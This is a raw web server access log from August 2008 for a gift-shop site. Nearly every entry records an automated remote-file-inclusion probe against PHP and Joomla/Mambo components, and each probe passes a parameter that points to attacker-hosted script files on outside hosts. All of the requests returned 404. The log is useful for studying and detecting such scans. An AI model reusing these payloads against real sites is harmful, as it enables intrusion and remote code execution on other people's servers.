207.58.137.81 - - [27/Aug/2008:05:51:59 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:05:52:17 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:52:27 -0700] "GET /logs/access_080606.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:52:27 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:52:28 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
66.221.68.20 - - [27/Aug/2008:05:52:42 -0700] "GET /logs/access_080727.log%20/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:52:50 -0700] "GET /logs/access_080719.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
61.19.249.82 - - [27/Aug/2008:05:53:02 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.morningstargifts.com"
61.19.249.82 - - [27/Aug/2008:05:53:02 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:55:31 -0700] "GET /logs//errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:55:31 -0700] "GET //errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:55:39 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:55:39 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:55:39 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
128.121.21.48 - - [27/Aug/2008:05:56:00 -0700] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.morningstargifts.com"
128.121.21.48 - - [27/Aug/2008:05:56:00 -0700] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:05:56:20 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:05:56:21 -0700] "GET /logs/access_080727.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:05:56:29 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:05:56:29 -0700] "GET /logs/access_080727.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:57:22 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:57:27 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:57:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:58:00 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:58:00 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:58:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:05:58:22 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:05:58:22 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:59:14 -0700] "GET /errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:00:20 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:00:20 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:01:43 -0700] "GET /logs/access_080606.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:01:44 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:01:44 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:01:50 -0700] "GET /logs/access_080606.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:01:50 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:01:50 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
217.113.53.6 - - [27/Aug/2008:06:02:18 -0700] "GET ///vwar/backup/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
217.113.53.6 - - [27/Aug/2008:06:02:18 -0700] "GET ///vwar/backup/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:02:19 -0700] "GET /logs/access_080719.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:06:02:19 -0700] "GET /logs/access_080719.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
200.49.100.20 - - [27/Aug/2008:06:03:20 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.morningstargifts.com"
200.49.100.20 - - [27/Aug/2008:06:03:20 -0700] "GET /logs/access_080710.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.morningstargifts.com"
200.49.100.20 - - [27/Aug/2008:06:03:20 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:03:52 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:03:52 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:04:22 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:04:22 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:05:16 -0700] "GET //include/lib.inc.php?site_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:05:16 -0700] "GET //include/lib.inc.php?site_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:05:16 -0700] "GET /logs//include/lib.inc.php?site_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:05:16 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:06:02 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:06:03 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:06:06:06 -0700] "GET /logs/access_080714.log//include/admin.php?rd=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:06:06:07 -0700] "GET //include/admin.php?rd=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:06:06:07 -0700] "GET /logs//include/admin.php?rd=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:06:07:05 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:06:07:34 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:07:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:08:00 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:08:00 -0700] "GET /logs/access_080727.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
217.113.53.6 - - [27/Aug/2008:06:08:57 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
217.113.53.6 - - [27/Aug/2008:06:08:57 -0700] "GET ///vwar/backup/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
217.113.53.6 - - [27/Aug/2008:06:08:58 -0700] "GET /logs///vwar/backup/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:09:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:09:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:09:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:09:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "morningstargifts.com"
89.111.184.180 - - [27/Aug/2008:06:10:19 -0700] "GET /logs/access.log//convert/mvcw.php?step=1&vwar_root=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
89.111.184.180 - - [27/Aug/2008:06:10:20 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
89.111.184.180 - - [27/Aug/2008:06:10:20 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
204.214.80.199 - - [27/Aug/2008:06:10:32 -0700] "GET /logs/scripts.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://borneo.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
204.214.80.199 - - [27/Aug/2008:06:10:34 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://borneo.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
204.214.80.199 - - [27/Aug/2008:06:10:36 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://borneo.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:06:13:13 -0700] "GET /logs/errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:06:13:13 -0700] "GET /errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
80.93.62.97 - - [27/Aug/2008:06:14:54 -0700] "GET /logs/access.log//errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
80.93.62.97 - - [27/Aug/2008:06:14:55 -0700] "GET //errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
80.93.62.97 - - [27/Aug/2008:06:14:55 -0700] "GET /logs//errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:15:04 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:15:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:15:31 -0700] "GET //admin/business_inc/saveserver.php?thisdir=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:15:31 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:15:32 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "morningstargifts.com"
212.103.152.139 - - [27/Aug/2008:06:15:32 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:06:16:16 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:06:16:16 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:06:16:16 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:06:16:16 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:06:16:16 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:06:16:16 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
87.119.195.22 - - [27/Aug/2008:06:18:00 -0700] "GET /logs/access.log/errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
87.119.195.22 - - [27/Aug/2008:06:18:00 -0700] "GET /errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
87.119.195.22 - - [27/Aug/2008:06:18:00 -0700] "GET /logs/errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
83.223.100.182 - - [27/Aug/2008:06:18:09 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
83.223.100.182 - - [27/Aug/2008:06:18:09 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
83.223.100.182 - - [27/Aug/2008:06:18:09 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
83.223.100.182 - - [27/Aug/2008:06:18:10 -0700] "GET /logs/access_080710.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:18:51 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:18:51 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:18:51 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:18:51 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:06:19:38 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:06:19:39 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:20:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:20:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:20:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:20:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.119.195.22 - - [27/Aug/2008:06:20:48 -0700] "GET /errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
